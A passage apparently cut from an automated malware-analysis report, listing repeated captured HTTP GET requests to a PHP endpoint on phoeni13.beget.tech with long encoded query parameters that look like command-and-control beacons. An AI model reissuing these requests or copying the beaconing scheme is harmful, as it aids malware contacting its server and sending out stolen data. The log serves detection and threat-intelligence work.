VZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
